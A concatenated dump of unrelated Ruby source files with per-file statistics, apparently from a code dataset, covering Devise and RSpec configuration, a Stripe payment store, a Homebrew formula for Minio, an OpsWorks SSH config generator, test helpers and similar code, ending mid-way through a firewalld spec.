# Configure the default scope given to Warden. By default it's the first
# devise role declared in your routes (usually :user).
# config.default_scope = :user
# Set this configuration to false if you want /users/sign_out to sign out
# only the current scope. By default, Devise signs out all scopes.
# config.sign_out_all_scopes = true
# ==> Navigation configuration
  # Lists the formats that should be treated as navigational. Formats like
  # :html should redirect to the sign in page when the user does not have
  # access, while formats like :xml or :json should return 401.
#
# If you have any extra navigational formats, like :iphone or :mobile, you
# should add them to the navigational formats lists.
#
# The "*/*" below is required to match Internet Explorer requests.
# config.navigational_formats = ['*/*', :html]
# The default HTTP method used to sign out a resource. Default is :delete.
config.sign_out_via = :delete
# ==> OmniAuth
# Add a new OmniAuth provider. Check the wiki for more information on setting
# up on your models and hooks.
# config.omniauth :github, 'APP_ID', 'APP_SECRET', scope: 'user,public_repo'
# ==> Warden configuration
  # If you want to use other strategies that are not supported by Devise, or
  # change the failure app, you can configure them inside the config.warden block.
#
# config.warden do |manager|
# manager.intercept_401 = false
# manager.default_strategies(scope: :user).unshift :some_external_strategy
# end
# ==> Mountable engine configurations
  # When using Devise inside a mountable engine (let's call it `MyEngine`),
  # there are some extra configurations to be taken into account.
# The following options are available, assuming the engine is mounted as:
#
# mount MyEngine, at: '/my_engine'
#
# The router that invoked `devise_for`, in the example above, would be:
# config.router_name = :my_engine
#
  # When using OmniAuth, Devise cannot automatically set the OmniAuth path,
  # so you need to do it manually. For the users scope, it would be:
# config.omniauth_path_prefix = '/my_engine/users/auth'
# ==> Turbolinks configuration
# If your app is using Turbolinks, Turbolinks::Controller needs to be included to make redirection work correctly:
#
# ActiveSupport.on_load(:devise_failure_app) do
# include Turbolinks::Controller
# end
# ==> Configuration for :registerable
# When set to false, does not sign a user in automatically after their password is
# changed. Defaults to true, so a user is signed in automatically after changing a password.
# config.sign_in_after_change_password = true
end
| 48.685897 | 154 | 0.752535 |
bb7931c8a7af0857bbb96cad036c7190b847a7c3 | 4,798 | require 'coveralls'
Coveralls.wear!
# This file was generated by the `rails generate rspec:install` command. Conventionally, all
# specs live under a `spec` directory, which RSpec adds to the `$LOAD_PATH`.
# The generated `.rspec` file contains `--require spec_helper` which will cause
# this file to always be loaded, without a need to explicitly require it in any
# files.
#
# Given that it is always loaded, you are encouraged to keep this file as
# light-weight as possible. Requiring heavyweight dependencies from this file
# will add to the boot time of your test suite on EVERY test run, even for an
# individual file that may not need all of that loaded. Instead, consider making
# a separate helper file that requires the additional dependencies and performs
# the additional setup, and require it from the spec files that actually need
# it.
#
# See http://rubydoc.info/gems/rspec-core/RSpec/Core/Configuration
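#
# A common convention (not required by RSpec) is to keep this file minimal
# and put framework-specific setup in a separate helper, e.g. a
# `spec/rails_helper.rb` that begins with `require 'spec_helper'`.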
RSpec.configure do |config|
# rspec-expectations config goes here. You can use an alternate
# assertion/expectation library such as wrong or the stdlib/minitest
# assertions if you prefer.
config.expect_with :rspec do |expectations|
# This option will default to `true` in RSpec 4. It makes the `description`
# and `failure_message` of custom matchers include text for helper methods
# defined using `chain`, e.g.:
# be_bigger_than(2).and_smaller_than(4).description
# # => "be bigger than 2 and smaller than 4"
# ...rather than:
# # => "be bigger than 2"
expectations.include_chain_clauses_in_custom_matcher_descriptions = true
end
# rspec-mocks config goes here. You can use an alternate test double
# library (such as bogus or mocha) by changing the `mock_with` option here.
config.mock_with :rspec do |mocks|
# Prevents you from mocking or stubbing a method that does not exist on
# a real object. This is generally recommended, and will default to
# `true` in RSpec 4.
mocks.verify_partial_doubles = true
end
# This option will default to `:apply_to_host_groups` in RSpec 4 (and will
# have no way to turn it off -- the option exists only for backwards
# compatibility in RSpec 3). It causes shared context metadata to be
# inherited by the metadata hash of host groups and examples, rather than
# triggering implicit auto-inclusion in groups with matching metadata.
config.shared_context_metadata_behavior = :apply_to_host_groups
# The settings below are suggested to provide a good initial experience
# with RSpec, but feel free to customize to your heart's content.
=begin
# This allows you to limit a spec run to individual examples or groups
# you care about by tagging them with `:focus` metadata. When nothing
# is tagged with `:focus`, all examples get run. RSpec also provides
# aliases for `it`, `describe`, and `context` that include `:focus`
# metadata: `fit`, `fdescribe` and `fcontext`, respectively.
config.filter_run_when_matching :focus
# Allows RSpec to persist some state between runs in order to support
# the `--only-failures` and `--next-failure` CLI options. We recommend
# you configure your source control system to ignore this file.
config.example_status_persistence_file_path = "spec/examples.txt"
# Limits the available syntax to the non-monkey patched syntax that is
# recommended. For more details, see:
# - http://rspec.info/blog/2012/06/rspecs-new-expectation-syntax/
# - http://www.teaisaweso.me/blog/2013/05/27/rspecs-new-message-expectation-syntax/
# - http://rspec.info/blog/2014/05/notable-changes-in-rspec-3/#zero-monkey-patching-mode
config.disable_monkey_patching!
# Many RSpec users commonly either run the entire suite or an individual
# file, and it's useful to allow more verbose output when running an
# individual spec file.
if config.files_to_run.one?
# Use the documentation formatter for detailed output,
# unless a formatter has already been configured
# (e.g. via a command-line flag).
config.default_formatter = "doc"
end
# Print the 10 slowest examples and example groups at the
# end of the spec run, to help surface which specs are running
# particularly slow.
config.profile_examples = 10
# Run specs in random order to surface order dependencies. If you find an
# order dependency and want to debug it, you can fix the order by providing
# the seed, which is printed after each run.
# --seed 1234
config.order = :random
# Seed global randomization in this process using the `--seed` CLI option.
# Setting this allows you to use `--seed` to deterministically reproduce
# test failures related to randomization by passing the same `--seed` value
# as the one that triggered the failure.
Kernel.srand config.seed
=end
end
| 47.98 | 92 | 0.74406 |
e2993351310aefe0403105112b83fa5c625dd6fc | 2,740 | module StripeService::Store::StripePayment
StripePaymentModel = ::StripePayment
InitialPaymentData = EntityUtils.define_builder(
[:community_id, :mandatory, :fixnum],
[:transaction_id, :mandatory, :fixnum],
[:payer_id, :mandatory, :string],
[:receiver_id, :mandatory, :string],
[:status, const_value: :pending],
[:currency, :mandatory, :string],
[:sum_cents, :fixnum],
[:authenticate_cents, :fixnum],
[:commission_cents, :fixnum],
[:buyer_commission_cents, :fixnum],
[:fee_cents, :fixnum],
[:subtotal_cents, :fixnum],
[:stripe_charge_id, :string]
)
StripePayment = EntityUtils.define_builder(
[:community_id, :mandatory, :fixnum],
[:transaction_id, :mandatory, :fixnum],
[:payer_id, :mandatory, :string],
[:receiver_id, :mandatory, :string],
[:status, :mandatory, :to_symbol],
[:sum, :money],
[:commission, :money],
[:authenticate, :money],
[:buyer_commission, :money],
[:fee, :money],
[:real_fee, :money],
[:subtotal, :money],
[:stripe_charge_id, :string],
[:stripe_transfer_id, :string],
[:transfered_at, :time],
[:available_on, :time]
)
module_function
  def update(opts)
    raise ArgumentError.new("No data provided") if opts[:data].nil?

    payment = find_payment(opts)
    old_data = from_model(payment)
    update_payment!(payment, opts[:data])
  end
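  # Illustrative usage (IDs and amounts below are hypothetical; the accepted
  # keys are the InitialPaymentData fields above):
  #
  #   StripeService::Store::StripePayment.create(
  #     community_id, transaction_id,
  #     payer_id: "cus_123", receiver_id: "acct_456",
  #     currency: "USD", sum_cents: 10_000
  #   )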
def create(community_id, transaction_id, order)
payment_data = InitialPaymentData.call(order.merge({community_id: community_id, transaction_id: transaction_id}))
model = StripePaymentModel.create!(payment_data)
from_model(model)
end
def get(community_id, transaction_id)
Maybe(StripePaymentModel.where(
community_id: community_id,
transaction_id: transaction_id
).first)
.map { |model| from_model(model) }
.or_else(nil)
end
def from_model(stripe_payment)
hash = HashUtils.compact(
EntityUtils.model_to_hash(stripe_payment).merge({
sum: stripe_payment.sum,
fee: stripe_payment.fee,
commission: stripe_payment.commission,
authenticate: stripe_payment.authenticate,
buyer_commission: stripe_payment.buyer_commission,
subtotal: stripe_payment.subtotal,
real_fee: stripe_payment.real_fee
}))
StripePayment.call(hash)
end
def find_payment(opts)
StripePaymentModel.where(
"(community_id = ? and transaction_id = ?)",
opts[:community_id],
opts[:transaction_id]
).first
end
def data_changed?(old_data, new_data)
old_data != new_data
end
def update_payment!(payment, data)
payment.update!(data)
from_model(payment.reload)
end
end
| 27.959184 | 117 | 0.666423 |
e83654c9197baa0b456b76d83b5cec26d5b13cc2 | 352 | class LoginPage < SitePrism::Page
set_url '/mercurysignon.php'
element :campo_login, 'input[name*="userName"]'
element :campo_senha, 'input[name*="password"]'
element :botao_entrar, 'input[name*="login"]'
def logar(usuario, senha)
campo_login.set usuario
campo_senha.set senha
botao_entrar.click
end
end | 29.333333 | 51 | 0.670455 |
4ad2c6eca2169ec0adb1f7a951ad0dbca877764a | 55 | json.partial! "api/v2/imports/import", import: @import
| 27.5 | 54 | 0.745455 |
21abc012f8ed9bff5e9eb7d39b9be6a0431657a6 | 1,989 | require "chef/chef_fs/file_system/base_fs_object"
require "chef/chef_fs/file_system/nonexistent_fs_object"
class Chef
module ChefFS
module FileSystem
class MultiplexedDir < BaseFSDir
def initialize(*multiplexed_dirs)
@multiplexed_dirs = multiplexed_dirs.flatten
super(@multiplexed_dirs[0].name, @multiplexed_dirs[0].parent)
end
attr_reader :multiplexed_dirs
def write_dir
multiplexed_dirs[0]
end
        def children
          # Memoized; create_child below resets the cache.
          @children ||= begin
result = []
seen = {}
# If multiple things have the same name, the first one wins.
multiplexed_dirs.each do |dir|
dir.children.each do |child|
if seen[child.name]
Chef::Log.warn("Child with name '#{child.name}' found in multiple directories: #{seen[child.name].path_for_printing} and #{child.path_for_printing}") unless seen[child.name].path_for_printing == child.path_for_printing
else
result << child
seen[child.name] = child
end
end
end
result
end
end
def make_child_entry(name)
result = nil
multiplexed_dirs.each do |dir|
child_entry = dir.child(name)
if child_entry.exists?
if result
Chef::Log.debug("Child with name '#{child_entry.name}' found in multiple directories: #{result.parent.path_for_printing} and #{child_entry.parent.path_for_printing}")
else
result = child_entry
end
end
end
result
end
def can_have_child?(name, is_dir)
write_dir.can_have_child?(name, is_dir)
end
def create_child(name, file_contents = nil)
@children = nil
write_dir.create_child(name, file_contents)
end
end
end
end
end
| 30.6 | 236 | 0.571644 |
1a2360a5d3fffcfd328fff7edcd2f357d7866463 | 2,382 | # Configure Rails Environment
ENV["RAILS_ENV"] = "test"
# Disable warnings locally
$VERBOSE = ENV["CI"]
require File.expand_path("dummy/config/environment.rb", __dir__)
ActiveRecord::Migrator.migrations_paths = [File.expand_path("dummy/db/migrate", __dir__), File.expand_path("../db/migrate", __dir__)]
require "rails/test_help"
require "minitest/rails"
require "byebug"
# Processors for testing
require "braintree"
require "stripe"
require "stripe_event"
require "paddle_pay"
# Filter out Minitest backtrace while allowing backtrace from other libraries
# to be shown.
Minitest.backtrace_filter = Minitest::BacktraceFilter.new
# Load fixtures from the engine
if ActiveSupport::TestCase.respond_to?(:fixture_path=)
ActiveSupport::TestCase.fixture_path = File.expand_path("../fixtures", __FILE__)
ActionDispatch::IntegrationTest.fixture_path = ActiveSupport::TestCase.fixture_path
ActiveSupport::TestCase.file_fixture_path = ActiveSupport::TestCase.fixture_path + "/files"
ActiveSupport::TestCase.fixtures :all
end
class ActiveSupport::TestCase
include ActiveJob::TestHelper
end
require "minitest/mock"
require "mocha/minitest"
# Uncomment to view the stacktrace for debugging tests
Rails.backtrace_cleaner.remove_silencers!
unless ENV["SKIP_VCR"]
require "webmock/minitest"
require "vcr"
VCR.configure do |c|
c.cassette_library_dir = "test/vcr_cassettes"
c.hook_into :webmock
c.allow_http_connections_when_no_cassette = true
c.filter_sensitive_data("<VENDOR_ID>") { ENV["PADDLE_VENDOR_ID"] }
c.filter_sensitive_data("<VENDOR_AUTH_CODE>") { ENV["PADDLE_VENDOR_AUTH_CODE"] }
end
class ActiveSupport::TestCase
setup do
VCR.insert_cassette name
end
teardown do
VCR.eject_cassette name
end
end
end
Pay.braintree_gateway = Braintree::Gateway.new(
environment: :sandbox,
merchant_id: "zyfwpztymjqdcc5g",
public_key: "5r59rrxhn89npc9n",
private_key: "00f0df79303e1270881e5feda7788927"
)
paddle_public_key = OpenSSL::PKey::RSA.new(File.read("test/support/fixtures/paddle/verification/paddle_public_key.pem"))
ENV["PADDLE_PUBLIC_KEY_BASE64"] = Base64.encode64(paddle_public_key.to_der)
logger = Logger.new("/dev/null")
logger.level = Logger::INFO
Pay.braintree_gateway.config.logger = logger
module Braintree
class Configuration
def self.gateway
Pay.braintree_gateway
end
end
end
| 28.023529 | 133 | 0.7733 |
1c5e83581833d03176db1931b108d154ceeae74d | 3,131 | require 'test_helper'
class UserTest < ActiveSupport::TestCase
def setup
@user = User.new(
name: "Example User",
email: "[email protected]",
password: "foobar",
password_confirmation: "foobar")
end
test "should be valid" do
assert @user.valid?
end
test "name should be present" do
@user.name = " "
assert_not @user.valid?
end
test "email should be present" do
@user.email = " "
assert_not @user.valid?
end
test "name should not be too long" do
@user.name = "a" * 51
assert_not @user.valid?
end
test "email should not be too long" do
@user.email = "a" * 244 + "@example.com"
assert_not @user.valid?
end
test "email validation should accept valid addresses" do
valid_addresses = %w[[email protected] [email protected] [email protected]
[email protected] [email protected]]
valid_addresses.each do |valid_address|
@user.email = valid_address
assert @user.valid?, "#{valid_address.inspect} should be valid"
end
end
test "email validation should reject invalid addresses" do
invalid_addresses = %w[user@example,com user_at_foo.org user.name@example.
foo@bar_baz.com foo@bar+baz.com]
invalid_addresses.each do |invalid_address|
@user.email = invalid_address
assert_not @user.valid?, "#{invalid_address.inspect} should be invalid"
end
end
test "email addresses should be unique" do
duplicate_user = @user.dup
duplicate_user.email = @user.email.upcase
@user.save
assert_not duplicate_user.valid?
end
test "password should be present (nonblank)" do
@user.password = @user.password_confirmation = " " * 6
assert_not @user.valid?
end
test "password should have a minimum length" do
@user.password = @user.password_confirmation = "a" * 5
assert_not @user.valid?
end
test "authenticated? should return false for a user with nil digest" do
assert_not @user.authenticated?(:remember, '')
end
test "associated microposts should be destroyed" do
@user.save
@user.microposts.create!(content: "Lorem ipsum")
assert_difference 'Micropost.count', -1 do
@user.destroy
end
end
test "should follow and unfollow a user" do
michael = users(:michael)
archer = users(:archer)
assert_not michael.following?(archer)
michael.follow(archer)
assert michael.following?(archer)
assert archer.followers.include?(michael)
michael.unfollow(archer)
assert_not michael.following?(archer)
end
test "feed should have the right posts" do
michael = users(:michael)
archer = users(:archer)
lana = users(:lana)
    # Posts from followed users should appear in the feed
lana.microposts.each do |post_following|
assert michael.feed.include?(post_following)
end
    # The user's own posts should appear in the feed
michael.microposts.each do |post_self|
assert michael.feed.include?(post_self)
end
# フォローしていないユーザーの投稿を確認
archer.microposts.each do |post_unfollowed|
assert_not michael.feed.include?(post_unfollowed)
end
end
end
| 27.707965 | 78 | 0.667838 |
b9170140b4405fc5842ce300ee93e42aca3a8b85 | 1,419 | class Hugo < Formula
desc "Configurable static site generator"
homepage "https://gohugo.io/"
url "https://github.com/gohugoio/hugo/archive/v0.60.0.tar.gz"
sha256 "cc6b72d2bb56f57bf4a51afcaddfec37bd895b163b47a595dc64e3063c733a4a"
head "https://github.com/gohugoio/hugo.git"
bottle do
cellar :any_skip_relocation
sha256 "891bfede22375b71d2f2bf97608154773657fee30ced2b8a5037a39083edbc04" => :catalina
sha256 "42c2d442620f09272f0342d46020cdd1f3be4277095440e7e9690845bd3e9926" => :mojave
sha256 "f3b0d12c08e768ba981c14d25805f7bfd0ff1018f8d80c4158a52912210abcc3" => :high_sierra
end
depends_on "go" => :build
def install
ENV["GOPATH"] = HOMEBREW_CACHE/"go_cache"
(buildpath/"src/github.com/gohugoio/hugo").install buildpath.children
cd "src/github.com/gohugoio/hugo" do
system "go", "build", "-o", bin/"hugo", "-tags", "extended", "main.go"
# Build bash completion
system bin/"hugo", "gen", "autocomplete", "--completionfile=hugo.sh"
bash_completion.install "hugo.sh"
# Build man pages; target dir man/ is hardcoded :(
(Pathname.pwd/"man").mkpath
system bin/"hugo", "gen", "man"
man1.install Dir["man/*.1"]
prefix.install_metafiles
end
end
test do
site = testpath/"hops-yeast-malt-water"
system "#{bin}/hugo", "new", "site", site
assert_predicate testpath/"#{site}/config.toml", :exist?
end
end
| 33 | 93 | 0.704722 |
1c2660b5c7faf42995b62682d792c40524bc6323 | 3,220 | #!/usr/bin/env ruby
# Encoding: utf-8
#
# Copyright:: Copyright 2012, Google Inc. All Rights Reserved.
#
# License:: Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
# implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# This example removes the user from all its teams. To determine which users
# exist, run get_all_users.rb.
require 'ad_manager_api'
def delete_user_team_associations(ad_manager, user_id)
# Get the UserTeamAssociationService.
uta_service = ad_manager.service(:UserTeamAssociationService, API_VERSION)
# Create filter text to remove association by user ID.
statement = ad_manager.new_statement_builder do |sb|
sb.where = 'userId = :user_id'
sb.with_bind_variable('user_id', user_id)
end
begin
# Get user team associations by statement.
page = uta_service.get_user_team_associations_by_statement(
statement.to_statement()
)
unless page[:results].nil?
page[:results].each do |association|
puts ('User team association of user ID %d with team ID %d will be ' +
'deleted.') % [association[:user_id], association[:team_id]]
end
end
# Increase the statement offset by the page size to get the next page.
statement.offset += statement.limit
end while statement.offset < page[:total_result_set_size]
# Configure the statement to perform the delete action.
statement.configure do |sb|
sb.offset = nil
sb.limit = nil
end
# Perform the action.
result = uta_service.perform_user_team_association_action(
{:xsi_type => 'DeleteUserTeamAssociations'},
statement.to_statement()
)
# Display results.
if !result.nil? && result[:num_changes] > 0
puts 'Number of user team associations deleted: %d' % result[:num_changes]
else
puts 'No user team associations were deleted.'
end
end
if __FILE__ == $0
API_VERSION = :v201902
# Get AdManagerApi instance and load configuration from ~/ad_manager_api.yml.
ad_manager = AdManagerApi::Api.new
# To enable logging of SOAP requests, set the log_level value to 'DEBUG' in
# the configuration file or provide your own logger:
# ad_manager.logger = Logger.new('ad_manager_xml.log')
begin
user_id = 'INSERT_USER_ID_HERE'.to_i
delete_user_team_associations(ad_manager, user_id)
# HTTP errors.
rescue AdsCommon::Errors::HttpError => e
puts "HTTP Error: %s" % e
# API errors.
rescue AdManagerApi::Errors::ApiException => e
puts "Message: %s" % e.message
puts 'Errors:'
e.errors.each_with_index do |error, index|
puts "\tError [%d]:" % (index + 1)
error.each do |field, value|
puts "\t\t%s: %s" % [field, value]
end
end
end
end
| 31.881188 | 79 | 0.690373 |
ab8b6342ca98d00181aedf3dfda8d640435d6270 | 121 | class AddCookieSaltToUsers < ActiveRecord::Migration
def change
add_column :users, :cookie_salt, :string
end
end
| 20.166667 | 52 | 0.768595 |
ac2d36d9e8d2f7a51de574987d81770d7951b5e8 | 437 | require 'redis'
module Humperdink
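  # Wraps a Redis client so that, after a Process.fork, the child process
  # reconnects before issuing any command (a socket shared across forked
  # processes would otherwise corrupt the protocol stream).
  #
  # Illustrative usage (the URL is hypothetical):
  #   redis = Humperdink::ForkSavvyRedis.new(Redis.new(url: 'redis://localhost:6379'))
  #   redis.sadd('seen', 'value') # safe in both the parent and a forked child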
class ForkSavvyRedis
def initialize(redis)
@redis = redis
@pid = Process.pid
end
def method_missing(meth_id, *args, &block)
reconnect_on_fork
@redis.send(meth_id, *args, &block)
end
def reconnect_on_fork
if Process.pid != @pid
@redis.client.reconnect
@pid = Process.pid
end
yield @redis if block_given?
end
end
end | 19 | 46 | 0.622426 |
39a865a2691f940e4f5ea6bca01167760b426a44 | 391 | module Twostroke::AST
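  # AST node for a JavaScript try/catch/finally statement. `walk` performs a
  # depth-first traversal: the block is called with each node, and its truthy
  # return value decides whether to descend into that node's child statements.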
class Try < Base
attr_accessor :try_statements, :catch_variable, :catch_statements, :finally_statements
def walk(&bk)
if yield self
        try_statements.each { |s| s.walk(&bk) }
        catch_statements.each { |s| s.walk(&bk) } if catch_statements
        finally_statements.each { |s| s.walk(&bk) } if finally_statements
end
end
end
end | 30.076923 | 90 | 0.662404 |
ff8394b947592cca90444f8d6957ebcef73107b8 | 2,447 | # frozen_string_literal: true
require 'spec_helper'
describe ClustersHelper do
describe '#has_rbac_enabled?' do
context 'when kubernetes platform has been created' do
let(:platform_kubernetes) { build_stubbed(:cluster_platform_kubernetes) }
let(:cluster) { build_stubbed(:cluster, :provided_by_gcp, platform_kubernetes: platform_kubernetes) }
it 'returns kubernetes platform value' do
expect(helper.has_rbac_enabled?(cluster)).to be_truthy
end
end
context 'when kubernetes platform has not been created yet' do
let(:cluster) { build_stubbed(:cluster, :providing_by_gcp) }
it 'delegates to cluster provider' do
expect(helper.has_rbac_enabled?(cluster)).to be_truthy
end
context 'when ABAC cluster is created' do
let(:provider) { build_stubbed(:cluster_provider_gcp, :abac_enabled) }
let(:cluster) { build_stubbed(:cluster, :providing_by_gcp, provider_gcp: provider) }
it 'delegates to cluster provider' do
expect(helper.has_rbac_enabled?(cluster)).to be_falsy
end
end
end
end
describe '#create_new_cluster_label' do
subject { helper.create_new_cluster_label(provider: provider) }
context 'GCP provider' do
let(:provider) { 'gcp' }
it { is_expected.to eq('Create new cluster on GKE') }
end
context 'AWS provider' do
let(:provider) { 'aws' }
it { is_expected.to eq('Create new cluster on EKS') }
end
context 'other provider' do
let(:provider) { 'other' }
it { is_expected.to eq('Create new cluster') }
end
context 'no provider' do
let(:provider) { nil }
it { is_expected.to eq('Create new cluster') }
end
end
describe '#render_new_provider_form' do
subject { helper.new_cluster_partial(provider: provider) }
context 'GCP provider' do
let(:provider) { 'gcp' }
it { is_expected.to eq('clusters/clusters/gcp/new') }
end
context 'AWS provider' do
let(:provider) { 'aws' }
it { is_expected.to eq('clusters/clusters/aws/new') }
end
context 'other provider' do
let(:provider) { 'other' }
it { is_expected.to eq('clusters/clusters/cloud_providers/cloud_provider_selector') }
end
context 'no provider' do
let(:provider) { nil }
it { is_expected.to eq('clusters/clusters/cloud_providers/cloud_provider_selector') }
end
end
end
| 27.188889 | 107 | 0.665713 |
2611af99151001e9175bf683a097499547d7c85e | 3,363 | # frozen_string_literal: true
require 'aws-sdk'
require 'trollop'
require 'opzworks'
SSH_PREFIX = '# --- OpzWorks ---'
SSH_POSTFIX = '# --- End of OpzWorks ---'
module OpzWorks
class Commands
class SSH
def self.banner
'Generate and update SSH configuration files'
end
def self.run
options = Trollop.options do
banner <<-EOS.unindent
#{SSH.banner}
opzworks ssh {stack1} {stack2} {...}
The stack name can be passed as any unique regex. If no
arguments are passed, the command will iterate over all stacks.
Options:
EOS
opt :update, 'Update ~/.ssh/config directly'
opt :backup, 'Backup old SSH config before updating'
opt :quiet, 'Use SSH LogLevel quiet', default: true
opt :private, 'Return private IPs, rather than the default of public', default: false
opt :raw, 'Return only raw IPs rather than .ssh/config format output', default: false
end
config = OpzWorks.config
client = Aws::OpsWorks::Client.new(region: config.aws_region, profile: config.aws_profile)
stacks = []
stack_data = client.describe_stacks
if ARGV.empty?
stack_data[:stacks].each { |stack| stacks.push(stack) }
else
ARGV.each do |arg|
stack_data[:stacks].each do |stack|
stacks.push(stack) if stack[:name] =~ /#{arg}/
end
end
end
stacks.each do |stack|
instances = []
stack_name = ''
stack_name = stack[:name].gsub('::', '-')
result = client.describe_instances(stack_id: stack[:stack_id])
instances += result.instances.select { |i| i[:status] != 'stopped' }
instances.map! do |instance|
ip = if options[:private]
instance[:private_ip]
else
instance[:elastic_ip].nil? ? instance[:public_ip] : instance[:elastic_ip]
end
if options[:raw]
puts ip
else
next if ip.nil?
parameters = {
'Host' => "#{instance[:hostname]}-#{stack_name}",
'HostName' => ip,
'User' => config.ssh_user_name
}
parameters['LogLevel'] = 'quiet' if options[:quiet]
parameters.map { |param| param.join(' ') }.join("\n ")
end
end
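          # Each non-raw entry renders as an ssh_config stanza, e.g.
          # (hostname and address here are illustrative):
          #
          #   Host web1-MyStack
          #     HostName 203.0.113.10
          #     User deploy
          #     LogLevel quiet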
next if options[:raw]
new_contents = "#{instances.join("\n")}\n"
if options[:update]
ssh_config = "#{ENV['HOME']}/.ssh/config"
old_contents = File.read(ssh_config)
if options[:backup]
backup_name = ssh_config + '.backup'
File.open(backup_name, 'w') { |file| file.puts old_contents }
end
File.open(ssh_config, 'w') do |file|
file.puts old_contents.gsub(
/\n?\n?#{SSH_PREFIX}.*#{SSH_POSTFIX}\n?\n?/m,
''
)
file.puts new_contents
end
puts "Successfully updated #{ssh_config} with #{instances.length} instances!"
else
puts new_contents.strip
end
end
end
end
end
end
| 30.297297 | 98 | 0.521558 |
03929c24bd93c8092f09bc3974aba2e176d2d37c | 738 | class RubyBotJob < ApplicationJob
queue_as :default
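  # If the incoming message contains none of the search keywords below, it is
  # answered by the conversational bot; otherwise it is treated as a search
  # query and the results are broadcast to the room instead.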
def perform(data,room_id,to_ignore=nil)
search_keywords = %w{scouring rummage foraging forage hunting seeking hunt looking quest exploration frisking frisk activity manhunt shakedown ransacking searching help}
if (data["body"].split(' ').collect(&:downcase) & search_keywords).blank?
data["body"] = Rails::Bot.conversation(data["body"])
data["sent_by"] = "Bot"
data["time"] = Time.now.strftime("at %I:%M%p")
data["type_of_message"] = "bot"
ActionCable.server.broadcast("chat_#{room_id}", data)
else
ActionCable.server.broadcast("chat_#{room_id}", Rails::Bot.search(data["body"].gsub("Looking for","")))
end
end
end
| 36.9 | 172 | 0.680217 |
e29364f3f8433fe8debcc43d36bf2cc493403746 | 2,602 | class Minio < Formula
desc "High Performance, Kubernetes Native Object Storage"
homepage "https://min.io"
url "https://github.com/minio/minio.git",
tag: "RELEASE.2022-03-17T06-34-49Z",
revision: "ffcadcd99e012af6005145fb265ea88a0c3750ed"
version "20220317063449"
license "AGPL-3.0-or-later"
head "https://github.com/minio/minio.git", branch: "master"
livecheck do
url :stable
regex(%r{href=.*?/tag/(?:RELEASE[._-]?)?([\d\-TZ]+)["' >]}i)
strategy :github_latest do |page, regex|
page.scan(regex).map { |match| match&.first&.gsub(/\D/, "") }
end
end
bottle do
sha256 cellar: :any_skip_relocation, arm64_monterey: "2d9896a9051cbcccbce9917bae0f900079ad28034175e19eda3aff2c61ad9ad3"
sha256 cellar: :any_skip_relocation, arm64_big_sur: "0307e8e3c2643d2b3bd7d3f1bbeab0a3b0134a4a5c7667c469f1ef69adfb1159"
sha256 cellar: :any_skip_relocation, monterey: "d6fc58ef3c5986a6cf435a06d5fdd5f26eff13c07aba02fbcdbeff03e72ff109"
sha256 cellar: :any_skip_relocation, big_sur: "030b10fa037cfa8abb4ee0f1d248ddbde1b00141bbc806cf70bb66408f3d5a65"
sha256 cellar: :any_skip_relocation, catalina: "cc10eddf1fd82ff6203e35e173865349b8f85c3f77e547abddf0d561a2667a6d"
sha256 cellar: :any_skip_relocation, x86_64_linux: "cc627e4402627060e5136c2ba7671e262a5b4a21f66ad56331662a09e90a83d2"
end
depends_on "go" => :build
def install
if build.head?
system "go", "build", *std_go_args
else
release = `git tag --points-at HEAD`.chomp
version = release.gsub(/RELEASE\./, "").chomp.gsub(/T(\d+)-(\d+)-(\d+)Z/, 'T\1:\2:\3Z')
ldflags = %W[
-s -w
-X github.com/minio/minio/cmd.Version=#{version}
-X github.com/minio/minio/cmd.ReleaseTag=#{release}
-X github.com/minio/minio/cmd.CommitID=#{Utils.git_head}
]
system "go", "build", *std_go_args(ldflags: ldflags)
end
end
def post_install
(var/"minio").mkpath
(etc/"minio").mkpath
end
service do
run [opt_bin/"minio", "server", "--config-dir=#{etc}/minio", "--address=:9000", var/"minio"]
keep_alive true
working_dir HOMEBREW_PREFIX
log_path var/"log/minio.log"
error_log_path var/"log/minio.log"
end
test do
assert_match "minio server - start object storage server",
shell_output("#{bin}/minio server --help 2>&1")
assert_match "minio gateway - start object storage gateway",
shell_output("#{bin}/minio gateway 2>&1")
assert_match "ERROR Unable to validate credentials",
shell_output("#{bin}/minio gateway s3 2>&1", 1)
end
end
| 36.647887 | 123 | 0.691007 |
abaf0c0cf1db266740e8a1f29f879fc665fd47ef | 2,295 | # encoding: UTF-8
# This file is auto-generated from the current state of the database. Instead
# of editing this file, please use the migrations feature of Active Record to
# incrementally modify your database, and then regenerate this schema definition.
#
# Note that this schema.rb definition is the authoritative source for your
# database schema. If you need to create the application database on another
# system, you should be using db:schema:load, not running all the migrations
# from scratch. The latter is a flawed and unsustainable approach (the more migrations
# you'll amass, the slower it'll run and the greater likelihood for issues).
#
# It's strongly recommended that you check this file into your version control system.
ActiveRecord::Schema.define(version: 20160321141336) do
create_table "beliefs", force: :cascade do |t|
t.string "name"
t.datetime "created_at", null: false
t.datetime "updated_at", null: false
end
create_table "distortions", force: :cascade do |t|
t.string "name"
t.datetime "created_at", null: false
t.datetime "updated_at", null: false
end
create_table "lady_bugs", force: :cascade do |t|
t.text "content"
t.datetime "created_at", null: false
t.datetime "updated_at", null: false
t.integer "user_id"
end
create_table "log_lady_bugs", force: :cascade do |t|
t.integer "log_id"
t.integer "lady_bug_id"
t.datetime "created_at", null: false
t.datetime "updated_at", null: false
end
create_table "log_tags", force: :cascade do |t|
t.integer "log_id"
t.integer "tag_id"
t.datetime "created_at", null: false
t.datetime "updated_at", null: false
end
create_table "logs", force: :cascade do |t|
t.text "content"
t.integer "before_rating"
t.integer "after_rating"
t.integer "distortion_id"
t.integer "user_id"
t.datetime "created_at", null: false
t.datetime "updated_at", null: false
t.integer "belief_id"
end
create_table "tags", force: :cascade do |t|
t.string "name"
t.datetime "created_at", null: false
t.datetime "updated_at", null: false
end
create_table "users", force: :cascade do |t|
t.string "name"
t.string "email"
t.string "password_digest"
end
end
| 31.438356 | 86 | 0.697168 |
5dd0a53fa71aa2513efb4bbfb7ee2a00f59f2ed4 | 1,210 | require 'spec_helper'
describe Puppet::Type.type(:firewalld_service) do
before do
Puppet::Provider::Firewalld.any_instance.stubs(:state).returns(:true) # rubocop:disable RSpec/AnyInstance
end
context 'with no params' do
describe 'when validating attributes' do
[:name, :service, :zone].each do |param|
